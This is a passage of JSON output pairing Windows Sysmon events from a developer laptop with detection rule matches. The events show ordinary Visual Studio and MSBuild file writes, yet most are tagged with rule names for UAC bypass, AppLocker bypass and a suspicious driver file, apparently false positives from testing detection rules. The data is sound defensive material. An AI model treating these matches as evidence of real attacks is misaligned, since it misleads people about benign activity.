13:21:13.236"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429127,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.237481Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.558","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\b8162606fcd2bea192a83c85aaff3292f908cfde","UtcTime":"2021-01-26 13:21:13.558"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429128,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.558988Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.560"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429129,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.560814Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.560","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\NuGetScratch\\lock\\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3","UtcTime":"2021-01-26 13:21:13.561"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429130,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.561514Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.290","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.log","UtcTime":"2021-01-26 13:21:13.683"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429131,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.683762Z"}},"Version":2}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\bouss\\source\\repos\\blabla\\","Description":"MSBuild.exe","FileVersion":"16.6.0.22303","Hashes":"SHA1=20456AC066815ED10C6CEF51AF5431ED6001532F,MD5=35DC099BE64FA5AB4C01DDA908745240,SHA256=5083FD9C0AB7ECAEE85B04A22EBD29A88D7BC75CB02186D9C9736269B8AC10A9,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-5082-600D-0000-0020A246F726","LogonId":"0x26f746a2","OriginalFileName":"MSBuild.exe","ParentCommandLine":"\"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe\" \"C:\\Users\\bouss\\source\\repos\\blabla\\blabla.sln\"","ParentImage":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ParentProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ParentProcessId":7664,"ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"Product":"Microsoft® Build Tools®","RuleName":"","TerminalSessionId":5,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2021-01-26 13:21:13.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2429132,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.690036Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:14:25.641","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\blabla.lastbuildstate","UtcTime":"2021-01-26 13:21:13.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429134,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.972503Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429135,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.975523Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:13.975","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd","UtcTime":"2021-01-26 13:21:13.975"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429136,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:13.975732Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 13:21:14.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429140,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.399477Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.394"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429141,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425366Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.394","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp5938b880d43743db91973c95f519f06b.tmp","UtcTime":"2021-01-26 13:21:14.395"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429142,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425472Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429143,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425565Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.396","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Temp\\tmp19546d957b6e4d15b83f93a323d5f087.rsp","UtcTime":"2021-01-26 13:21:14.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429144,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.425664Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.852"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429148,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.871509Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.826","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.write.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429149,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.871745Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429150,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.871980Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:14.818","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.read.1.tlog","UtcTime":"2021-01-26 13:21:14.854"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429151,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.872190Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:15:06.578","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\MSBuild\\Current\\Bin\\MSBuild.exe","ProcessGuid":"00247C92-1749-6010-0000-0010348FD92E","ProcessId":2988,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\source\\repos\\blabla\\blabla\\Debug\\blabla.tlog\\CL.command.1.tlog","UtcTime":"2021-01-26 13:21:14.855"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429152,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:14.872564Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.229","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp","UtcTime":"2021-01-26 13:21:23.229"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429153,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:23.229964Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.302","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp","UtcTime":"2021-01-26 13:21:23.302"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2429154,"Execution":{"#attributes":{"ProcessID":5272,"ThreadID":6060}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2021-01-26T13:21:23.303639Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2021-01-26 13:21:23.305","Image":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\devenv.exe","ProcessGuid":"00247C92-172A-6010-0000-00103C3DD02E","ProcessId":7664,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\AppData\\Local\\Microsoft\\VSApplicationInsights\\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp","UtcTime":"2021-01-26 